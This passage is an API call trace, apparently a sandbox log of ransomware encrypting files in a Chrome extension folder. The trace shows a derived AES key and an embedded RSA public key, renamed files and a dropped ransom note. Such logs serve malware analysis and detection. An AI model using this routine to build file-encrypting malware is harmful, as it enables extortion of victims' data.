lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.384] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.384] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.384] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.384] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.384] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.385] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.385] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.385] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x227, lpOverlapped=0x0) returned 1 [0262.385] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x227, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x230) returned 1 [0262.385] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x230, lpOverlapped=0x0) returned 1 [0262.385] CloseHandle (hObject=0x5d60) returned 1 [0262.385] CloseHandle (hObject=0x5d5c) returned 1 [0262.385] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), bFailIfExists=0) returned 1 [0262.407] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json", dwFileAttributes=0x0) returned 1 [0262.407] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg")) returned 1 [0262.408] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.fuck")) returned 1 [0262.410] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.410] CryptDestroyKey (hKey=0x2e7d940) returned 1 [0262.410] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.410] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.410] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.410] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\readme_back_files.htm")) returned 0xffffffff [0262.410] AreFileApisANSI () returned 1 [0262.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.410] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.411] GetFileType (hFile=0x5d64) returned 0x1 [0262.411] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.413] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.413] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.413] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.413] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.413] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.414] GetLastError () returned 0x0 [0262.414] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json")) returned 0x20 [0262.414] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0262.415] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.416] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.421] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.421] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.424] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.424] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.424] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.424] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7dd40) returned 1 [0262.424] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.424] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.424] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e72938) returned 1 [0262.424] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72938, dwCertEncodingType=0x1, pInfo=0x2ead010*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead040*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead048*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d900) returned 1 [0262.424] CryptEncrypt (in: hKey=0x2e7d900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.425] CryptEncrypt (in: hKey=0x2e7d900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73570*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73570*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.425] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e73570*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73570*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.426] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.434] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.435] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.452] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.453] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.453] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.453] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.453] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.453] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.454] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.454] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.454] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.454] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.454] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.454] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.455] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.455] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.455] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 